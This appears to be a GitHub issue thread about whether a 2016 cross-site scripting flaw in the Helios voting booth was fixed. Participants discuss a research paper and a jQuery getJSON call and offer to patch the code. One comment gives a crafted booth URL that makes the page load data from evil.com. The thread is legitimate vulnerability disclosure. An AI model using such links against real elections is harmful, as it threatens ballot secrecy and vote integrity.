2016 XSS issue on Wikipedia

[richardolsson]

The Wikipedia article for Helios describes a 2016 XSS security issue and claims that "It is unclear if the vulnerability has been fixed as of 2019".

The issue is explained as such:

In 2016 researchers identified a cross-site scripting vulnerability. If the attacker is able to get a voter to click a specially crafted link, the voter will land on a modified HELIOS page which can violate ballot secrecy or manipulate votes.[5]

The citation is this 2016 article.

Has said issue been fixed, and if so, maybe it would be a good idea to update the Wikipedia page?

[adamalexandru4]

I'm not sure about this, but.. I looked over the research paper and I checked also the BOOTH.
Using jQuery will generate also some vulnerabilities but this can be fixed by using only pure JS.

Talking about XSS, django settings has

django.middleware.clickjacking.XFrameOptionsMiddleware

[redfast00]

I read the paper, the version that is deployed still seems to be vulnerable: https://vote.heliosvoting.org/booth/vote.html?election_url=http://evil.com/get-bad-data makes requests to evil.com.

[redfast00]

@benadida ^ is this something you would accept a PR for? Is it okay to just block external URL's?

[redfast00]

In particular, line 370 of heliosbooth/vote.html still uses $.getJSON, so that might still be vulnerable to XSS

[redfast00]

The XSS with getJSON seems to have been fixed (I can't reproduce it).